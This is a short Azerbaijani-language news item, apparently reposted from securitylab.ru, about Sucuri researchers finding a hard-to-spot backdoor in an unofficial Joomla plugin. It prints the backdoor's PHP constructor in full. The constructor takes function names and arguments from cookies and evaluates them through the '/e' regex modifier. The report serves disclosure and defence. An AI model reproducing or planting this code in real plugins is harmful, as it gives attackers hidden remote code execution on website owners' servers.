joomlaSucuri təhlükəsizlik şirkətinin araşdırmaçıları öz bloqlarında Joomla platforması üçün qeyri rəsmi plaqin içərisində “maraqlı bakdor”  aşkarladıqlarını yazırlar.

Mütəxəssislərin sözlərinə hər şey o qədər yaxşı düşünülmüşdür ki, ilk öncə onlar bakdorla qarşılaşdıqlarını anlamamışlar. Kod aşağıdakı kimidir:

public function __construct() {

 $filter = JRequest::getString('p3', Null, 'cookie');
 if ($filter) {
 $option = $filter(JRequest::getString('p2', Null, 'cookie'));
 $auth = $filter(JRequest::getString('p1', Null, 'cookie'));
 $option("/123/e",$auth,123);
 die();
 }
 }

 “İlk baxışda sübhəli heçnə yoxdur. Şifrələmə yoxdur, qarışıqlıq yoxdur və artıq şərh yazılmayıb. Joomla üçün adi plaqin kodudur, – Sucuri şirkəti qeyd edir. – Ancaq diqqətlə baxdıqda, kodun elədə təhlükəsiz olmadığını görmək olur”.

Araşdırıcılar qeyd edir ki, boşluğu koda diqqətlə baxmadıqda görmək mümkün deyildir. Bundan əlavə bir çox təhlükəsizlik skanerlərinin bu kodu buraxacaqlarına əmindirlər.

Hesabatla ətraflı buradan tanış ola bilərsiniz.

Mınbə: www.securitylab.ru